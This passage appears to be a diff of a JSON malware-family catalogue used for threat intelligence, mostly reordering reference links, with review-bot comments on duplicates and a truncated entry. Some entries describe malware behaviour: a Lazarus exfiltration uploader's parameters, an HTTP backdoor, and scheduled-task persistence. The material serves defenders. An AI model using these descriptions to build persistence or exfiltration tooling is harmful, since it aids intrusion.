- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.connectwise.com/resources/hive-profile",
- "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
 "https://github.com/reecdeep/HiveV5_file_decryptor",
+ "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/",
 "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
- 
"https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
+ "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
+ "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/",
+ "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
+ "https://www.connectwise.com/resources/hive-profile",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
+ "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://blog.group-ib.com/hive",
+ "https://arxiv.org/pdf/2202.08477.pdf",
+ "https://www.ic3.gov/Media/News/2021/210825.pdf",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
+ "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/",
+ "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
+ 
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
 "https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/",
+ "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
 "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
 "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
 "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://arxiv.org/pdf/2202.08477.pdf",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
- "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
- "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
- "https://www.ic3.gov/Media/News/2021/210825.pdf",
- 
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
- "https://blog.group-ib.com/hive",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
 "https://github.com/rivitna/Malware/tree/main/Hive",
- "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/"
+ "https://www.varonis.com/blog/hive-ransomware-analysis"
 ],
 "synonyms": [],
 "type": []
@@ -28012,17 +29323,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight",
- "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a",
- "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A",
- "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
 "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A",
 "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/",
+ "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/"
 ],
 "synonyms": [
 "HANGMAN"
@@ -28076,9 +29387,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
 "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
- "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d"
+ "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/"
 ],
 "synonyms": [],
 "type": []
@@ -28091,10 +29402,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://securelist.com/lazarus-under-the-hood/77908/",
+ "https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf",
 "https://content.fireeye.com/apt/rpt-apt38",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -28107,32 +29421,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini",
- "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt",
+ "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
+ "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
 "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md",
- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
+ "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt",
+ "http://blog.morphisec.com/hworm-houdini-aka-njrat",
 "https://www.youtube.com/watch?v=XDAiS6KBDOs",
 "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://blogs.360.cn/post/APT-C-44.html",
+ "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://www.youtube.com/watch?v=h3KLKCdMUUY",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", 
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
- "https://www.youtube.com/watch?v=h3KLKCdMUUY",
- "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
 "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
- "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
- "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html",
 "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
- "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
- "http://blog.morphisec.com/hworm-houdini-aka-njrat",
- "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html"
 ],
 "synonyms": [
 "Hworm",
@@ -28178,17 +29492,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
- "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.secureworks.com/research/htran",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
+ "https://www.secureworks.com/research/htran",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
 ],
 "synonyms": [
 "HUC Packet Transmit Tool"
@@ -28203,12 +29517,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser",
- "https://attack.mitre.org/groups/G0026",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
 "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/",
+ "https://attack.mitre.org/groups/G0026",
 "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union"
 ],
 "synonyms": [
 "HttpDump"
@@ -28223,9 +29537,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf",
+ "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787",
 "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html",
- "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787"
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf"
 ],
 "synonyms": [
 "httpdr0pper"
@@ -28235,13 +29549,41 @@
 "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9",
 "value": "httpdropper"
 },
+ {
+ "description": "Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsnoop",
+ "https://blog.talosintelligence.com/introducing-shrouded-snooper/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f585fba9-4a75-4752-bfdd-a0049e4d8d63",
+ "value": "HTTPSnoop"
+ },
+ {
+ "description": "The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.\r\n\r\nIt accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://securelist.com/lazarus-threatneedle/100803/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "50723d62-ecf2-49de-9ce2-911045ae63f0",
+ "value": "HTTP(S) uploader"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy",
- "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf",
- "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html"
+ "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html",
+ "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -28254,9 +29596,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
 "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html"
+ "https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/",
+ "https://medium.com/@morimolymoly/hui-loader-malware-analysis-note-4fa0e1c791d3",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf"
 ],
 "synonyms": [],
 "type": []
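Review bot: The new "HTTP(S) uploader" description stops mid-sentence, ending `and the switch -p with a proxy IP address and port` with no closing punctuation, so it reads as truncated in any consumer that renders the text. It is presumably lifted verbatim from the ESET write-up listed in its refs; if the upstream text really ends there, the entry would still be better closed off, e.g. `...with a proxy IP address and port.` The HTTPSnoop entry added in the same hunk is fine as written.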
@@ -28338,33 +29682,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
+ "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
 "https://www.secureworks.com/research/threat-profiles/bronze-union",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt",
- "https://securelist.com/luckymouse-hits-national-data-center/86083/",
- "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
- "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
- "https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/",
- "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
- "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
 "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
- "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
- "https://www.intrinsec.com/apt27-analysis/",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://securelist.com/luckymouse-hits-national-data-center/86083/",
+ "https://www.mandiant.com/resources/blog/chinese-espionage-tactics",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
 "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
+ "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
 "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel"
+ "https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/",
+ "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html"
 ],
 "synonyms": [],
 "type": []
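Review bot: The new side of the win.hyperbro refs keeps several near-duplicate URLs that differ only in a trailing slash or hostname: `.../apt-group-targeting-governmental-agencies-in-east-asia` next to `.../east-asia/`, `.../luckymouse-ta428-compromise-able-desktop` next to `.../able-desktop/`, and `https://team-cymru.com/2020/03/25/...` next to `https://blog.team-cymru.com/2020/03/25/...`; the fireeye.com and mandiant.com unc215 entries also appear to point at the same article, and that last pair recurs in the win.hyperssl hunk below. Since these are carried over from the old side rather than introduced here, the fix presumably belongs in the generator: normalise each ref (strip the trailing slash, lower-case the host) and drop exact duplicates before emitting the array, keeping distinct archived and live URLs. Otherwise each regeneration will keep re-shuffling the same redundant entries.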
@@ -28391,18 +29736,19 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl",
 "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
- "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
- "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
 "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://www.mandiant.com/resources/blog/chinese-espionage-tactics",
+ "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
 "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
 "https://twitter.com/ESETresearch/status/1594937054303236096",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/"
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html"
 ],
 "synonyms": [
 "FOCUSFJORD",
@@ -28441,180 +29787,186 @@ "value": "Icarus" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe 